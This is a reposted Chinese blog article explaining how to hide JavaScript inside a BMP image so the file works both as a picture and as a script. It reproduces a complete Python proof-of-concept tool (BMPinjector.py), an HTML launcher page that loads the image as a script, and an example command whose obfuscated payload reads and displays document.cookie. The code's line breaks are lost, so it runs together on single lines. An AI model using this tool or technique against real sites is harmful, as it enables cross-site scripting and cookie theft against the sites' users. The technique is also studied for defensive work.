BMP图片中注入恶意JS代码
来源:互联网 发布:淘宝运营必备软件 编辑:程序博客网 时间:2024/06/10 11:57
转至http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html(需翻墙)
http://danqingdani.blog.163.com/blog/static/186094195201392303213948/ (中文翻译)
1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/*
BMP文件的第三、四、五、六字节表示BMP文件的大小
2. 在BMP文件末尾添加
(1)\xFF
(2)\x2A\x2F,对应的js中的注释符号*/
(3)\x3D\x31\x3B,对应的=1; 是为了伪造成BMP格式
(4)定制的JS代码
BMPinjector.py 代码如下
#!/usr/bin/env python2#============================================================================================================##======= Simply injects a JavaScript Payload into a BMP. ====================================================##======= The resulting BMP must be a valid (not corrupted) BMP. =============================================##======= Author: marcoramilli.blogspot.com ==================================================================##======= Version: PoC (don't even think to use it in development env.) ======================================##======= Disclaimer: ========================================================================================##THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE#POSSIBILITY OF SUCH DAMAGE.#===========================================================================================================#import argparseimport os#---------------------------------------------------------def _hexify(num):"""Converts and formats to hexadecimal"""num = "%x" % numif len(num) % 2:num = '0'+numreturn num.decode('hex')#---------------------------------------------------------#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]#;alert(_0xe428[0]);"def _generate_and_write_to_file(payload, fname):"""Generates a fake but valid BMP within scriting"""f = open(fname, "wb")header = (b'\x42\x4D' #Signature BMb'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header b'\x00\x00\x00\x00' #Reservedb'\x00\x00\x00\x00' #bitmap data offsetb''+ _hexify( len(payload) ) + #bitmap header size b'\x00\x00\x00\x14' #width 20pixel .. it's up to youb'\x00\x00\x00\x14' #height 20pixel .. it's up to you b'\x00\x00' #nb_planb'\x00\x00' #nb per pixelb'\x00\x10\x00\x00' #compression typeb'\x00\x00\x00\x00' #image size .. its ignoredb'\x00\x00\x00\x01' #Horizontal resolutionb'\x00\x00\x00\x01' #Vertial resolutionb'\x00\x00\x00\x00' #number of colorsb'\x00\x00\x00\x00' #number important colorsb'\x00\x00\x00\x80' #palet colors to be complientb'\x00\x80\xff\x80' #palet colors to be complientb'\x80\x00\xff\x2A' #palet colors to be complientb'\x2F\x3D\x31\x3B' #*/=1;)# I made this explicit, step by step .f.write(header)f.write(payload)f.close()return True#---------------------------------------------------------def _generate_launching_page(f):"""Creates the HTML launching page"""htmlpage ="""<html><head><title>Opening an image</title> </head><body><img src=\"""" + f + """\"\><script src= \"""" + f + """\"> </script></body></html>"""html = open("run.html", "wb")html.write(htmlpage);html.close()return True#---------------------------------------------------------def _inject_into_file(payload, fname):"""Injects the payload into existing BMPNOTE: if the BMP contains \xFF\x2A might caouse issues"""# I know, I can do it all in memory and much more fast.# I wont do it here.f = open(fname, "r+b")b = f.read()b.replace(b'\x2A\x2F',b'\x00\x00')f.close()f = open(fname, "w+b")f.write(b)f.seek(2,0)f.write(b'\x2F\x2A')f.close()f = open(fname, "a+b")f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')f.write(payload)f.close()return True#---------------------------------------------------------if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("filename",help="the bmp file name to be generated/or infected")parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")args = parser.parse_args()print("""|======================================================================================================|| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. || It is the end user's responsibility to obey all applicable local, state and federal laws. || Authors assume no liability and are not responsible for any misuse or damage caused by this program ||======================================================================================================|""")if args.inject_to_existing_bmp: _inject_into_file(args.js_payload, args.filename)else:_generate_and_write_to_file(args.js_payload, args.filename)_generate_launching_page(args.filename)print "[+] Finished!"执行
python BMPinjector.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"效果如图
- BMP图片中注入恶意JS代码
- 图片攻击-BMP图片中注入恶意JS代码
- BMP图片解码代码
- 读取bmp图片代码
- 实战http3b3.orgc.js恶意SQL注入
- Android中向webview注入js代码
- Android在WebView中注入Js代码
- BMP图片文件加密代码
- 实战http://3b3.org/c.js恶意SQL注入
- 实战http://3b3.org/c.js恶意SQL注入
- 实战http://3b3.org/c.js恶意SQL注入
- 清除SQL被注入恶意病毒代码的语句
- 清除SQL被注入恶意病毒代码 详细出处参考
- 防js代码注入
- Android webView 中 注入js 获取网页中的 图片
- API显示BMP图片ASM代码
- C++生成Bmp图片底层代码
- OpenGL-纹理读取BMP图片-代码
- htmlentities() 和 htmlspecialchars()区别
- 如何使UIScrollView的滚动条indicator一直显示
- C# .NET treeView(树形控件)绑定数据的通用方法 (精)
- MySQL中Global、Session和Both(Global & Session)范围的Dynamic及Not Dynamic类型的变量的作用范围和设置方法
- Tomcat开启压缩传输
- BMP图片中注入恶意JS代码
- MFC 开发界面增加控件提示 的方法
- Django class-based views
- Android判断网络是否可用
- 线性代数导论10——四个基本子空间
- 手工注入详解
- android 屏蔽按键自定义焦点(下、上、一焦点指向自己)
- hdu 2854 Central Meridian Number
- Qualcomm AR之创建简单工程
